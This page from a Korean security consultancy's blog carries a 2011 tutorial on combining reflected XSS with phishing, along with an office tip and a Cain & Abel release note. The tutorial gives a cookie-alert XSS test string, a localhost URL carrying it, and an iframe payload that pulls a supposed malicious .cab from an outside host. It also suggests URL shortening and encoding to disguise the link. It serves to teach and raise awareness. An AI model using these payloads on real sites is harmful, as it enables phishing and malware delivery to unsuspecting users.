티스토리 툴바

Daum
Tistory
로그인

STG Security Life~

공지 사항

XSS With Phishing

취약점 분석연구 2011/02/09 16:21 by 비회원

 


XSS(Cross Site Scripting)의 정의

 

XSS는 웹 어플리케이션에 클라이언트로부터 악의적인 데이터를 받아들일때 발생합니다.

이렇게 받아 들여진 데이터는 다른 클라이언트가 그 페이지에 접근 할 경우에 전달 되게 되고, 이 클라이언트는 정상적인 데이터로 인식하고 그 내용을 해석 하게됩니다. 

즉 웹 어플리케이션을 매개로 하여 다른 사용자의 브라우저에서 스크립트 실행이 가능해
지는 것입니다.

이 취약점은 OWASP 에서 TOP10에 수년째 계속 이어져오는 중요한 취약점 입니다.



XSS 에 관한 내용은 제가 운영하고 있는 회사 블로그에서 포스팅 된적 있으며

기술본부 인원들에게 메일로 전달한적이 있습니다.

이를 다시 확인하시고 싶으면



그리고 효과적인 XSS 및 ActiveX 에 대한 이야기는

다음에서 확인하실 수 있습니다.



지금부터 말씀드릴 내용은 위 에서 말씀드린 효과적인 XSS 에 대한 응용 방안에 대한 이야기입니다.

Reflected XSS에 관한 내용은 미리 아시다시피 사용자가 원하지 않는 페이지로 이동시킬 수 있어 

시스템의 악의적인 파일 감염을 시킬 수 있는 취약점 입니다.


이는 곧 Phishing 으로도 이루어질 수 있는데 다음과같은 형식으로 진행이 됩니다.




TestBed에서 작업하였음을 알립니다.




위 환경은 빨간색 테두리 된 부분에서 

식으로 사용자의 입력값을 받아 처리하게 됩니다.



이곳에서 XSS 테스트 문자열 


"><script>alert(document.cookie);</script>


를 삽입하게 되면 취약성이 존재함을 알 수 있게 됩니다.




이런 취약성은 다음과 같이 만들수도 있습니다.


http://localhost/main/search_product1.asp?qsearch=a"><script>alert(document.cookie);</script>


마찬가지로 취약성이 있음을 확인하게 됩니다.




사이트의 각 환경마다 다르겠지만 사용자의 입력값 중 <Script> 를  막아두는 경우를 만나게 됩니다.


이런 사이트는 다음과같은 공격을 통해 피싱 공격을 할 수 있습니다.



위 Cab 파일은 악의적인 사용자가 제작해놓은 악성코드라고 가정합니다.


이를 


"><iframe hei[중략]src="http://avinew.cafe24.com/activex/STGSecurity.cab"></iframe>


위와같이 제작하여 Reflected XSS 취약성을 부곽시킬 수 있습니다.



이는 곧 이렇게 활용할 수 있습니다.




이를 활용하는 모습입니다.




이러한 공격을 통해 사용자는 신뢰성이 있는 도메인을 통해 사용자가 심어놓은 악의적인 파일을 자신도 모르게 

다운받게 됩니다. 


(Location 후 악성 파일 유도가 아니라 페이지 내부에 iframe 형식을 이용 한다는것에 중점을 두시면됩니다.)


이를 좀 더 정교하게 하기 위해 Shorten URL 이나 


URI 를 속이기 위해 Encoding을 이용할 수 있습니다.





이 문서는 배포본이기 때문에 보안상 일부 코드를 제외 하였음을 알려드립니다.


////////////////////////////////////////////////

incle

STG Security Consulting Division / Consultant

////////////////////////////////////////////////














'취약점 분석연구' 카테고리의 다른 글

XSS With Phishing  (0) 2011/02/09
Cain & Abel v4.9.37 released  (0) 2011/01/25
아웃룩 2007에서 특정 사용자 글씨 깨지는 현상  (0) 2011/01/21
정보공유 - 교묘한 피싱기법  (0) 2010/12/31
아이폰 앱 다루기  (2) 2010/12/11
소스코드 진단 툴 Yasca에 대한 소개 문서  (3) 2010/10/21
0 Trackback 0 Comment

파일명 쉽게 변경하기

우리들의이야기 2011/01/27 09:59 by 비회원

이전에 도 비슷한 팁을 공유한적이 한번있는거같은데 

비슷한 팁을 알게되어 포스팅합니다 

이 팁을 알면 업무하실때 조금 더 편하실거같아 공유해드립니다

알기쉽게 동영상으로 첨부하니 확인하셔서 애용해주세요

환경 : windows7

1. 블락 상태에서 F2를 누르면 파일 이름 변경을 할 수있다.

2. Tab 키를 눌르면 다음 파일로 현상태 그대로 블럭이 넘어간다

쉽게 파일명 변경을 할 수 있습니다.

동영상 확인해보세요~

좋은하루되시기바랍니다 ^_^




'우리들의이야기' 카테고리의 다른 글

파일명 쉽게 변경하기  (0) 2011/01/27
2011년 STG 워크샵 후기  (0) 2011/01/10
STG 사내 볼링대회 개최  (0) 2010/12/31
11월 20일 북악산 산행  (1) 2010/11/24
청계산 산행 후기  (0) 2010/10/09
[프로젝트 이야기] - 여의도편  (0) 2010/08/20
0 Trackback 0 Comment

Cain & Abel v4.9.37 released

취약점 분석연구 2011/01/25 09:11 by 비회원

Cain & Abel v4.9.37 released

Cain & Abel v4.9.37 released
- Added TCP/UDP Large Send Offloading status detection on Windows Vista/Seven.
- Better handling of APR-SSL MitM threads.
- Fixed a problem with APR in Windows7 causing attacker's machine to be isolated from

poisoned hosts.
- Speed improvement in Credential Manager Password Decoder for x64 operating systems.

http://www.oxid.it/

'취약점 분석연구' 카테고리의 다른 글

XSS With Phishing  (0) 2011/02/09
Cain & Abel v4.9.37 released  (0) 2011/01/25
아웃룩 2007에서 특정 사용자 글씨 깨지는 현상  (0) 2011/01/21
정보공유 - 교묘한 피싱기법  (0) 2010/12/31
아이폰 앱 다루기  (2) 2010/12/11
소스코드 진단 툴 Yasca에 대한 소개 문서  (3) 2010/10/21
0 Trackback 0 Comment
1 2 3 4 5  ... 48 
BLOG main image
STG Security Life~
조금의 정보라도 도움이 되셨으면 그걸로 만족하겠습니다.
by STG Security

카테고리

STG Security (143)
공지사항 (1)
STG Story (10)
우리들의이야기 (7)
취약점 분석연구 (23)
스마트그리드 (8)
좋은책 추천 (3)
최신보안동향 (2)
재미있는 오픈소스 (5)
STG 소식지 (80)
상념 (2)

태그목록

달력

«   2012/05   »
    1 2 3 4 5
6 7 8 9 10 11 12
13 14 15 16 17 18 19
20 21 22 23 24 25 26
27 28 29 30 31    
tistory!get rss Tistory Tistory 가입하기!

최근에 올라온 글

최근에 달린 댓글

최근에 받은 트랙백

링크

STG Security's Blog is powered by Daum / Designed by Tistory